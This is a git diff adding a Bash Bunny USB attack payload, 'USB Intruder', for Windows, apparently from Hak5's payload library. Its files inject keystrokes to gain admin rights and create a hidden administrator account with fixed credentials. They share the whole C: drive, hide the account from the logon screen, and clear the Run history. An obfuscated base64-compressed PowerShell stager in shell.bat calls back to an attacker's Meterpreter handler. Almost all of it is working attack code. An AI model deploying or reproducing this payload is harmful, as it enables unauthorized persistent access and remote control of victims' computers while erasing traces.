diff --git a/payloads/library/remote_access/USB_Intruder/README.MD b/payloads/library/remote_access/USB_Intruder/README.MD new file mode 100644 index 00000000..5607c7cb --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/README.MD @@ -0,0 +1,51 @@ +# USB Intruder for BashBunny (and adaptable to TwinDucky) + +- Title: USB Intruder +- Author: B0rk +- Version: 1.1 +- Target: Windows 7+ +- Props: Hak5Darren, Diggster, IMcPwn, and many more +- Category: Infiltration/Execution + +## Description + +**THIS PAYLOAD ASSUMES YOUR VICTIM HAS ADMINISTRATOR PRIVILEGES** + +Infiltrates a target system and performs the following: + +Created a hidden ProgData folder in the %WinDir% (HID) +Sets powershell execution to unrestricted (HID) +Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the Windows directory (STORAGE) +Launches seq1.ps1 that launches the following tasks in order +Creates a new user with the following credentials - pwnie:dungothacked (UAC.bat) +Sets new user pwnie to local Administrators group (UAC.bat) +Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden) (UAC.bat) +Hides the new user pwnie from the logon screen (hide.ps1) +Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload (eject.ps1) +Executes a shell.bat file that a Meterpreter script that calls back to the Attacker's Handler (Create/Replace with your own) +Cleans up the Run dialogue history (HID) +Sync's the BashBunny for final removal (BB) + +**undo.bat is provided to reverse the creation actions above (in case you want to test)** + +**Be sure to have your handler ready to accept the incoming connection from the victim** + +## Configuration + +Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever payload you would like. + +There is always potential for additional scripts to be run from the seq1.bat file, so bolster it with additional jobs. + +**You will need to change delays accordingly to the profile of the victim's PC hardware.** + +## STATUS + +| LED | Status | +| --------------- | ---------------- | +| Solid White | Initialization | +| Blue Flashing | HID/Storage Phase| +| Yellow Flashing | Cleanup of Run | +| Green Flashing | Sync/EOF | +| Solid Green | 100% Complete | + +Discussion and Comments at https://forums.hak5.org/index.php?/topic/40981-payloadusb_intruder/ diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat b/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat new file mode 100644 index 00000000..b99150b8 --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/UAC.bat @@ -0,0 +1,4 @@ +@echo OFF +net user pwnie dungothacked /add +net localgroup Administrators pwnie /add +net share HACKED$=C:\ /grant:pwnie,FULL \ No newline at end of file diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1 b/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1 new file mode 100644 index 00000000..53e18990 --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/eject.ps1 @@ -0,0 +1,3 @@ +$BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter +$driveEject = New-Object -comObject Shell.Application +$driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject") \ No newline at end of file diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1 b/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1 new file mode 100644 index 00000000..b29417a2 --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/hide.ps1 @@ -0,0 +1,2 @@ +$path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' +New-Item $path -Force | New-ItemProperty -Name pwnie -Value 0 -PropertyType DWord -Force \ No newline at end of file diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1 b/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1 new file mode 100644 index 00000000..3f6f7d01 --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/seq1.ps1 @@ -0,0 +1,3 @@ +&"$Env:WinDir\ProgData\UAC.bat" +&"$Env:WinDir\ProgData\hide.ps1" +&"$Env:WinDir\ProgData\eject.ps1" \ No newline at end of file diff --git a/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat b/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat new file mode 100644 index 00000000..a9f02f5e --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/USB_Intruder/shell.bat @@ -0,0 +1,2 @@ +@echo off +if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") \ No newline at end of file diff --git a/payloads/library/remote_access/USB_Intruder/d.cmd b/payloads/library/remote_access/USB_Intruder/d.cmd new file mode 100644 index 00000000..65477328 --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/d.cmd @@ -0,0 +1,10 @@ +@echo OFF + +REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\ +set dst=%~dp0USB_Intruder + +REM Copying files from dst to %WinDir%\ProgData +xcopy /C /Q /G /Y /S %dst%\*.* %WinDir%\ProgData\ + +@cls +@exit \ No newline at end of file diff --git a/payloads/library/remote_access/USB_Intruder/payload.txt b/payloads/library/remote_access/USB_Intruder/payload.txt new file mode 100644 index 00000000..ccf2d5eb --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/payload.txt @@ -0,0 +1,76 @@ +#!/bin/bash +# +#TITLE: USB Intruder +#AUTHOR: B0rk +#VERSION: 1.1 +#PROPS: Hak5Darren, Diggster, IMcPwn and many more +#OS: Windows (Requires Powershell and Admin privs) +#ATTACKMODES: HID STORAGE +# +#DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends** +# +#LED INDICATORS: +#White - Initialization +#Blue Blinking - HID/STORAGE Phase +#Yellow Blinking - Cleanup +#Green Blinking - Syncing BB for removal +#Green - Attack Completion + +#Initialization - Setting AttackModes +LED W +ATTACKMODE HID STORAGE +#Initialization Completed + +#Beginning of HID/STORAGE Phase +LED B 10 +#Description:: +Q DELAY 2000 +Q GUI d +Q DELAY 100 +Q GUI r +Q DELAY 500 +Q STRING powershell -Command "Start-Process cmd -Verb RunAs" +Q ENTER +Q DELAY 1000 +Q ALT y +Q DELAY 800 +Q STRING mkdir C:\\Windows\\ProgData +Q ENTER +Q STRING attrib +h C:\\Windows\\ProgData +Q ENTER +Q STRING powershell +Q ENTER +Q DELAY 800 +Q STRING Set-ExecutionPolicy Unrestricted +Q ENTER +Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +Q ENTER +Q DELAY 2000 +Q STRING cd \$Env:WinDir\\ProgData +Q ENTER +Q STRING .\\seq1.ps1 +Q ENTER +Q DELAY 1000 +Q STRING powershell -WindowStyle Hidden \$Env:WinDir\ProgData\shell.bat +Q ENTER +Q STRING exit +Q ENTER +Q STRING exit +Q ENTER +Q DELAY 500 +#End of HID/STORAGE Phase + +#Cleanup +LED Y 100 +#Clears complete run history +Q GUI r +Q DELAY 500 +Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue +Q ENTER +#End of Cleanup + +#Completion of script +LED G 100 +sync +LED G +#Completed diff --git a/payloads/library/remote_access/USB_Intruder/undo.bat b/payloads/library/remote_access/USB_Intruder/undo.bat new file mode 100644 index 00000000..8fece0a8 --- /dev/null +++ b/payloads/library/remote_access/USB_Intruder/undo.bat @@ -0,0 +1,3 @@ +net user pwnie /delete +net share HACKED$ /delete +RD /S /Q %windir%\ProgData